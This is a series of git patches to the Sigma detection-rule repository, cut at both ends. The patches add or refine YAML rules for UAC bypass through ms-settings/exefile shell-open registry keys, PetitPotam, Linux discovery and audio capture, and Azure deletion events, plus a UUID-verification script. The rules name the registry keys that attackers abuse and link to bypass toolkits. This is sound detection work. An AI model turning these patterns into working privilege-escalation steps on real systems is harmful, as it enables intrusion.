https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf status: experimental -date: 2020/18/02 +date: 2020/02/18 modified: 2021/06/11 author: Sreeman tags: From 8bd859f55067c73ed74debec50b762ced43f0e8d Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Fri, 3 Sep 2021 13:07:42 +0200 Subject: [PATCH 0723/1367] Update lnx_auditd_system_info_discovery.yml --- rules/linux/auditd/lnx_auditd_system_info_discovery.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml index 56fba47f..1a3d1035 100644 --- a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml @@ -16,12 +16,12 @@ detection: - /etc/lsb-release - /etc/redhat-release - /etc/issue - condition: 'selection or selection2' - selection2: + selection2: type: EXECVE a0: - uname - uptime + condition: 'selection or selection2' tags: - attack.discovery - attack.t1082 From 2de2de8433fe7053bc1123f87a7199f5c53d35b4 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 3 Sep 2021 11:36:43 +0200 Subject: [PATCH 0724/1367] Addition to UAC Bypasses --- .../sysmon_uac_bypass_shell_open.yml | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 68481a95..42c2c471 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -1,11 +1,13 @@ title: UAC Bypass Using Registry Shell Open Keys id: 152f3630-77c1-4284-bcc0-4cc68ab2f6e7 -description: Detects the pattern of UAC Bypass using fodhelper.exe or computerdefaults.exe via registry keys (UACMe 33 or 62) +description: Detects the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) author: Christian Burkard date: 2021/08/30 status: experimental references: - https://github.com/hfiref0x/UACME + - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ + - https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass tags: - attack.defense_evasion - attack.privilege_escalation @@ -14,10 +16,18 @@ logsource: category: registry_event product: windows detection: - selection: + selection1: TargetObject|endswith: '_Classes\ms-settings\shell\open\command\SymbolicLinkValue' Details|contains: '\Software\Classes\{' - condition: selection + selection2: + TargetObject|endswith: '_Classes\ms-settings\shell\open\command\DelegateExecute' + selection3: + TargetObject|endswith: '_Classes\ms-settings\shell\open\command\(Default)' + selection4: + TargetObject|endswith: '_Classes\exefile\shell\open\command\(Default)' + filter: + Details: '(Empty)' + condition: selection1 or selection2 or ( (selection3 or selection4) and not filter) falsepositives: - Unknown level: high From f3bdb0e43d9bcfa9f78eb9483d4e49513448d22d Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 3 Sep 2021 13:18:41 +0200 Subject: [PATCH 0725/1367] fix: remove unneeded selection --- .../registry_event/sysmon_uac_bypass_shell_open.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 42c2c471..94469592 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -22,12 +22,12 @@ detection: selection2: TargetObject|endswith: '_Classes\ms-settings\shell\open\command\DelegateExecute' selection3: - TargetObject|endswith: '_Classes\ms-settings\shell\open\command\(Default)' - selection4: - TargetObject|endswith: '_Classes\exefile\shell\open\command\(Default)' + TargetObject|endswith: + - '_Classes\ms-settings\shell\open\command\(Default)' + - '_Classes\exefile\shell\open\command\(Default)' filter: Details: '(Empty)' - condition: selection1 or selection2 or ( (selection3 or selection4) and not filter) + condition: selection1 or selection2 or (selection3 and not filter) falsepositives: - Unknown level: high From aa2e86963c1870fe583d5c91ef8973ed0096d9b3 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 3 Sep 2021 13:21:29 +0200 Subject: [PATCH 0726/1367] fix: rename filter --- rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 94469592..032e1146 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -25,9 +25,9 @@ detection: TargetObject|endswith: - '_Classes\ms-settings\shell\open\command\(Default)' - '_Classes\exefile\shell\open\command\(Default)' - filter: + filter_sel3: Details: '(Empty)' - condition: selection1 or selection2 or (selection3 and not filter) + condition: selection1 or selection2 or (selection3 and not filter_sel3) falsepositives: - Unknown level: high From 815134df7f8fdb13e3dbc4ee90d3a899e36e49ef Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 3 Sep 2021 13:30:10 +0200 Subject: [PATCH 0727/1367] Cleanup --- .../auditd/lnx_auditd_system_info_discovery.yml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml index 1a3d1035..8578ba32 100644 --- a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml @@ -1,11 +1,11 @@ -title: 'System Information Discovery' -description: 'Detects System Information Discovery commands' +title: System Information Discovery +description: Detects System Information Discovery commands author: 'Pawel Mazur' status: experimental date: 2021/09/03 references: - - 'https://attack.mitre.org/techniques/T1082/' - - 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md' + - https://attack.mitre.org/techniques/T1082/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md logsource: product: linux service: auditd @@ -21,10 +21,10 @@ detection: a0: - uname - uptime - condition: 'selection or selection2' + condition: selection or selection2 tags: - attack.discovery - attack.t1082 falsepositives: - - 'Legitimate administrative activity' + - Legitimate administrative activity level: low From 769451dc032ff6f8e2d7d79ecdad1d7ac1e1ccbc Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 3 Sep 2021 13:42:15 +0200 Subject: [PATCH 0728/1367] Add missing id --- rules/linux/auditd/lnx_auditd_system_info_discovery.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml index 8578ba32..223be5b4 100644 --- a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml @@ -1,4 +1,5 @@ title: System Information Discovery +id: f34047d9-20d3-4e8b-8672-0a35cc50dc71 description: Detects System Information Discovery commands author: 'Pawel Mazur' status: experimental From a7a002cb7f5f90848902a0bb494176a7059379a0 Mon Sep 17 00:00:00 2001 From: mvelazco Date: Fri, 3 Sep 2021 10:01:54 -0400 Subject: [PATCH 0729/1367] updating fields as per frack113 feedback --- rules/windows/builtin/win_petitpotam_network_share.yml | 7 ++++--- rules/windows/builtin/win_petitpotam_susp_tgt_request.yml | 7 +++---- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/win_petitpotam_network_share.yml b/rules/windows/builtin/win_petitpotam_network_share.yml index 15ee76da..ca5ff7c2 100644 --- a/rules/windows/builtin/win_petitpotam_network_share.yml +++ b/rules/windows/builtin/win_petitpotam_network_share.yml @@ -16,9 +16,10 @@ logsource: detection: selection: EventID: 5145 - Share_Name: \\*\IPC$ - Relative_Target_Name: lsarpc - Account_Name: ANONYMOUS LOGON + ShareName|startswith: '\\' + ShareName|endswith: '\IPC$' + RelativeTargetName: lsarpc + SubjectUserName: ANONYMOUS LOGON condition: selection falsepositives: - Unknown. Feedback welcomed. diff --git a/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml index da7fdf9e..a576df1b 100644 --- a/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml +++ b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml @@ -23,11 +23,10 @@ logsource: detection: selection: EventID: 4768 - Account_Name|endswith: '$' - Certificate_Thumbprint: '*' + TargetUserName|endswith: '$' + CertThumbprint: '*' filter_local: - Client_Address: '::1' - + IpAddress: '::1' condition: selection and not filter_local falsepositives: - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts. From c0bdc3fb1ba26678d9541f0702102a1a9b024b94 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:23:21 -0500 Subject: [PATCH 0730/1367] Create azure_device_no_longer_managed_or_compliant.yml --- ..._device_no_longer_managed_or_compliant.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml diff --git a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml new file mode 100644 index 00000000..11fe4dd0 --- /dev/null +++ b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml @@ -0,0 +1,21 @@ +title: Azure Device No Longer Managed or Compliant +id: 542b9912-c01f-4e3f-89a8-014c48cdca7d +description: Identifies when a device in azure is no longer managed or compliant +author: Austin Songer +status: experimental +date: 2021/ +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - Device no longer compliant + - Device no longer managed + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Administrator may have forgotten to review the device. From b478132769fdfb947515420dce244f0ec7e8db50 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:23:59 -0500 Subject: [PATCH 0731/1367] Create azure_owner_removed_from_application_or_service_principal.yml --- ..._from_application_or_service_principal.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml diff --git a/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml b/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml new file mode 100644 index 00000000..cc6ba7d3 --- /dev/null +++ b/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml @@ -0,0 +1,23 @@ +title: Azure Owner Removed From Application or Service Principal +id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6 +description: Identifies when a owner is was removed from a application or service principal in Azure. +author: Austin Songer +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - Remove owner from service principal + - Remove owner from application + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Owner being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 6e15618c75baf4ed45a249054a011ce00abdac7c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:24:32 -0500 Subject: [PATCH 0732/1367] Create azure_device_or_configuration_deleted.yml --- .../azure_device_or_configuration_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_device_or_configuration_deleted.yml diff --git a/rules/cloud/azure/azure_device_or_configuration_deleted.yml b/rules/cloud/azure/azure_device_or_configuration_deleted.yml new file mode 100644 index 00000000..4156aa7d --- /dev/null +++ b/rules/cloud/azure/azure_device_or_configuration_deleted.yml @@ -0,0 +1,23 @@ +title: Azure Device or Configuration Deleted +id: 46530378-f9db-4af9-a9e5-889c177d3881 +description: Identifies when a device or device configuration in azure is deleted. +author: Austin Songer +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - Delete device + - Delete device configuration + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Device or device configuration being deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Device or device configuration deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 70ac0104cf129996705d1538642c4a1c6f010978 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:25:01 -0500 Subject: [PATCH 0733/1367] Create azure_service_principal_removed.yml --- .../azure/azure_service_principal_removed.yml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 rules/cloud/azure/azure_service_principal_removed.yml diff --git a/rules/cloud/azure/azure_service_principal_removed.yml b/rules/cloud/azure/azure_service_principal_removed.yml new file mode 100644 index 00000000..6be22898 --- /dev/null +++ b/rules/cloud/azure/azure_service_principal_removed.yml @@ -0,0 +1,21 @@ +title: Azure Service Principal Removed +id: 448fd1ea-2116-4c62-9cde-a92d120e0f08 +description: Identifies when a service principal was removed in Azure. +author: Austin Songer +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: "Remove service principal" + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Service principal being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 6744fb7f2ec6ded95cee76e72f418395f956c7e0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:25:34 -0500 Subject: [PATCH 0734/1367] Create azure_application_deleted.yml --- .../cloud/azure/azure_application_deleted.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure/azure_application_deleted.yml diff --git a/rules/cloud/azure/azure_application_deleted.yml b/rules/cloud/azure/azure_application_deleted.yml new file mode 100644 index 00000000..843bb212 --- /dev/null +++ b/rules/cloud/azure/azure_application_deleted.yml @@ -0,0 +1,23 @@ +title: Azure Application Deleted +id: 410d2a41-1e6d-452f-85e5-abdd8257a823 +description: Identifies when a application is deleted in Azure. +author: Austin Songer +status: experimental +date: 2021/09/03 +references: + - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - Delete application + - Hard Delete application + condition: selection +level: medium +tags: + - attack.defense_evasion +falsepositives: + - Application being deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From c021ae9e7c8507c1b3c42018d7da249cd1e76e99 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:28:35 -0500 Subject: [PATCH 0735/1367] Update and rename azure_device_or_configuration_deleted.yml to azure_device_or_configuration_modified_or_deleted.yml --- ..._device_or_configuration_modified_or_deleted.yml} | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename rules/cloud/azure/{azure_device_or_configuration_deleted.yml => azure_device_or_configuration_modified_or_deleted.yml} (57%) diff --git a/rules/cloud/azure/azure_device_or_configuration_deleted.yml b/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml similarity index 57% rename from rules/cloud/azure/azure_device_or_configuration_deleted.yml rename to rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml index 4156aa7d..c5136d76 100644 --- a/rules/cloud/azure/azure_device_or_configuration_deleted.yml +++ b/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml @@ -1,7 +1,7 @@ -title: Azure Device or Configuration Deleted +title: Azure Device or Configuration Modified or Deleted id: 46530378-f9db-4af9-a9e5-889c177d3881 -description: Identifies when a device or device configuration in azure is deleted. -author: Austin Songer +description: Identifies when a device or device configuration in azure is modified or deleted. +author: Austin Songer @austinsonger status: experimental date: 2021/09/03 references: @@ -13,11 +13,13 @@ detection: properties.message: - Delete device - Delete device configuration + - Update device + - Update device configuration condition: selection level: medium tags: - attack.impact falsepositives: - - Device or device configuration being deleted may be performed by a system administrator. + - Device or device configuration being modified or deleted may be performed by a system administrator. - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Device or device configuration deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 8fe7bfc4529255d84c666efd107afba2744171fb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:28:53 -0500 Subject: [PATCH 0736/1367] Update azure_application_deleted.yml --- rules/cloud/azure/azure_application_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_application_deleted.yml b/rules/cloud/azure/azure_application_deleted.yml index 843bb212..7160069c 100644 --- a/rules/cloud/azure/azure_application_deleted.yml +++ b/rules/cloud/azure/azure_application_deleted.yml @@ -1,7 +1,7 @@ title: Azure Application Deleted id: 410d2a41-1e6d-452f-85e5-abdd8257a823 description: Identifies when a application is deleted in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/03 references: From 9d26116d272653796bacfe5d12cf47e4a1ba3591 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:29:02 -0500 Subject: [PATCH 0737/1367] Update azure_device_no_longer_managed_or_compliant.yml --- .../cloud/azure/azure_device_no_longer_managed_or_compliant.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml index 11fe4dd0..e13c480c 100644 --- a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml +++ b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml @@ -1,7 +1,7 @@ title: Azure Device No Longer Managed or Compliant id: 542b9912-c01f-4e3f-89a8-014c48cdca7d description: Identifies when a device in azure is no longer managed or compliant -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/ references: From fda1e3362e7b7321e4125acd3f80d0ffdb32f62d Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:29:12 -0500 Subject: [PATCH 0738/1367] Update azure_owner_removed_from_application_or_service_principal.yml --- ...zure_owner_removed_from_application_or_service_principal.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml b/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml index cc6ba7d3..5db903ee 100644 --- a/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml +++ b/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml @@ -1,7 +1,7 @@ title: Azure Owner Removed From Application or Service Principal id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6 description: Identifies when a owner is was removed from a application or service principal in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/03 references: From c420a17e05d8848070a1dff6f62bd26afd36773c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:29:21 -0500 Subject: [PATCH 0739/1367] Update azure_service_principal_removed.yml --- rules/cloud/azure/azure_service_principal_removed.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_service_principal_removed.yml b/rules/cloud/azure/azure_service_principal_removed.yml index 6be22898..81ed2454 100644 --- a/rules/cloud/azure/azure_service_principal_removed.yml +++ b/rules/cloud/azure/azure_service_principal_removed.yml @@ -1,7 +1,7 @@ title: Azure Service Principal Removed id: 448fd1ea-2116-4c62-9cde-a92d120e0f08 description: Identifies when a service principal was removed in Azure. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/03 references: From 0612ea7f6e468bb6a2741f4c39ce58e36aeb4d2b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:42:26 -0500 Subject: [PATCH 0740/1367] Update azure_device_no_longer_managed_or_compliant.yml --- .../cloud/azure/azure_device_no_longer_managed_or_compliant.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml index e13c480c..13be7277 100644 --- a/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml +++ b/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml @@ -3,7 +3,7 @@ id: 542b9912-c01f-4e3f-89a8-014c48cdca7d description: Identifies when a device in azure is no longer managed or compliant author: Austin Songer @austinsonger status: experimental -date: 2021/ +date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory logsource: From e7c582777636dd563250eda84cab0faf8cdc3f90 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 3 Sep 2021 22:43:11 -0500 Subject: [PATCH 0741/1367] Update azure_service_principal_removed.yml --- rules/cloud/azure/azure_service_principal_removed.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/azure/azure_service_principal_removed.yml b/rules/cloud/azure/azure_service_principal_removed.yml index 81ed2454..e0501252 100644 --- a/rules/cloud/azure/azure_service_principal_removed.yml +++ b/rules/cloud/azure/azure_service_principal_removed.yml @@ -10,7 +10,7 @@ logsource: service: azure.activitylogs detection: selection: - properties.message: "Remove service principal" + properties.message: Remove service principal condition: selection level: medium tags: From caf78b5ea13dc20944779fb6b8da915cb5be3ff9 Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Sat, 4 Sep 2021 22:10:34 +0200 Subject: [PATCH 0742/1367] New Rule - Linux-Audio-Capture --- .../linux/auditd/lnx_auditd_audio_capture.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_audio_capture.yml diff --git a/rules/linux/auditd/lnx_auditd_audio_capture.yml b/rules/linux/auditd/lnx_auditd_audio_capture.yml new file mode 100644 index 00000000..3d3c5ccd --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_audio_capture.yml @@ -0,0 +1,28 @@ +title: Audio Capture +id: a7af2487-9c2f-42e4-9bb9-ff961f0561d5 +description: Detects attempts to record audio with arecord utility + #the actual binary that arecord is using and that has to be monitored is /usr/bin/aplay +author: 'Pawel Mazur' +status: experimental +date: 2021/09/04 +references: + - https://attack.mitre.org/techniques/T1123/ +logsource: + product: linux + service: auditd +detection: + selection: + type: EXECVE + a0: + - arecord + a1: + - '-vv' + a2: + - '-fdat' + condition: selection +tags: + - attack.collection + - attack.t1123 +falsepositives: + - None +level: low From fa5554660cb563c838955eae61602435deb3345a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 4 Sep 2021 17:33:05 -0500 Subject: [PATCH 0743/1367] Update sysmon_mal_cobaltstrike_re.yml --- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 3a857bbc..1ecc14c6 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -6,7 +6,7 @@ references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 date: 2021/07/30 -modifed: 2021/09/02 +modified: 2021/09/02 author: Florian Roth tags: - attack.defense_evasion From 5042ba65ac87557c931f3208c46d0d925ca46ee8 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Sun, 5 Sep 2021 09:28:53 +0200 Subject: [PATCH 0744/1367] Update lnx_auditd_audio_capture.yml Added more references about arecord. --- rules/linux/auditd/lnx_auditd_audio_capture.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/linux/auditd/lnx_auditd_audio_capture.yml b/rules/linux/auditd/lnx_auditd_audio_capture.yml index 3d3c5ccd..42246e7a 100644 --- a/rules/linux/auditd/lnx_auditd_audio_capture.yml +++ b/rules/linux/auditd/lnx_auditd_audio_capture.yml @@ -6,6 +6,8 @@ author: 'Pawel Mazur' status: experimental date: 2021/09/04 references: + - https://linux.die.net/man/1/arecord + - https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa - https://attack.mitre.org/techniques/T1123/ logsource: product: linux From acf2bfbd27a6c5fabc2348c73ead426c4e6f814e Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 10:43:42 +0200 Subject: [PATCH 0745/1367] Update sigma_uuid verify Make a better verify code --- rules/windows/builtin/win_apt_apt29_tor.yml | 3 +- tools/sigma/sigma_uuid.py | 63 +++++++++++++-------- 2 files changed, 42 insertions(+), 24 deletions(-) diff --git a/rules/windows/builtin/win_apt_apt29_tor.yml b/rules/windows/builtin/win_apt_apt29_tor.yml index 8e4e79c8..aec2c262 100755 --- a/rules/windows/builtin/win_apt_apt29_tor.yml +++ b/rules/windows/builtin/win_apt_apt29_tor.yml @@ -1,6 +1,5 @@ action: global title: APT29 Google Update Service Install -id: c069f460-2b87-4010-8dcf-e45bab362624 description: This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\Program Files (x86)\Google\Update\GoogleUpdate.exe so the service names and executable locations used by APT29 are specific enough to be detected in log files. references: @@ -13,6 +12,8 @@ tags: date: 2017/11/01 modified: 2020/08/23 author: Thomas Patzke +--- +id: c069f460-2b87-4010-8dcf-e45bab362624 logsource: product: windows service: system diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index b9b07f05..ce0f9ab6 100755 --- a/tools/sigma/sigma_uuid.py +++ b/tools/sigma/sigma_uuid.py @@ -1,10 +1,23 @@ #!/usr/bin/env python3 # Assign UUIDs to Sigma rules and verify UUID assignment for a Sigma rule repository +# Copyright 2016-2021 SigmaHQ + +# This program is free software: you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published by +# the Free Software Foundation, either version 3 of the License, or +# (at your option) any later version. + +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU Lesser General Public License for more details. +# You should have received a copy of the GNU Lesser General Public License +# along with this program. If not, see . from argparse import ArgumentParser from pathlib import Path from uuid import uuid4, UUID -import yaml +import ruamel.yaml from sigma.output import SigmaYAMLDumper @@ -15,7 +28,7 @@ def print_verbose(*arg, **kwarg): def yaml_preserve_order(self, dict_data): return self.represent_mapping("tag:yaml.org,2002:map", dict_data.items()) -def valid_rule(rule,i,path): +def valid_id(rule,i,path): try: UUID(rule["id"]) except ValueError: # id is not a valid UUID @@ -26,6 +39,22 @@ def valid_rule(rule,i,path): return False return True +def is_global(rule): + if 'action' in rule: + if rule['action'] == 'global': + return True + return False + +def is_id_uuid(rule): + if 'id' in rule: + try: + UUID(rule["id"]) + except ValueError: + return False + return True + return False + + def main(): argparser = ArgumentParser(description="Assign and verify UUIDs of Sigma rules") argparser.add_argument("--verify", "-V", action="store_true", help="Verify existence and uniqueness of UUID assignments. Exits with error code if verification fails.") @@ -43,36 +72,24 @@ def main(): else: paths = [ Path(pathname) for pathname in args.inputs ] - yaml.add_representer(dict, yaml_preserve_order) - uuids = set() passed = True for path in paths: print_verbose("Rule {}".format(str(path))) with path.open("r",encoding="UTF-8") as f: - rules = list(yaml.safe_load_all(f)) - - nb_rule = len(rules) + rules = list(ruamel.yaml.load_all(f,Loader=ruamel.yaml.RoundTripLoader)) + if args.verify: - if nb_rule == 1: - if not valid_rule(rules[0],1,path): passed = False - else: - if rules[0]["action"] == "global": - for i in range(1,nb_rule): - if not valid_rule(rules[i],i,path): passed = False - ''' + i = 0 for rule in rules: - - if "title" in rule: # Rule with a title should also have a UUID - try: - UUID(rule["id"]) - except ValueError: # id is not a valid UUID - print("Rule {} in file {} has a malformed UUID '{}'.".format(i, str(path), rule["id"])) + if is_global(rule): # No id in global section + if 'id' in rule: passed = False - except KeyError: # rule has no id - print("Rule {} in file {} has no UUID.".format(i, str(path))) + print("Rule {} in file {} has ID in global section.".format(i,str(path))) + else: + if not valid_id(rule,i,path): passed = False - ''' + i += 1 else: newrules = list() changed = False From ca4c156fa4ce0c3ae6b2c14c014ee7aa3c7a1841 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 5 Sep 2021 11:20:57 +0200 Subject: [PATCH 0746/1367] Update win_apt_apt29_tor.yml --- rules/windows/builtin/win_apt_apt29_tor.yml | 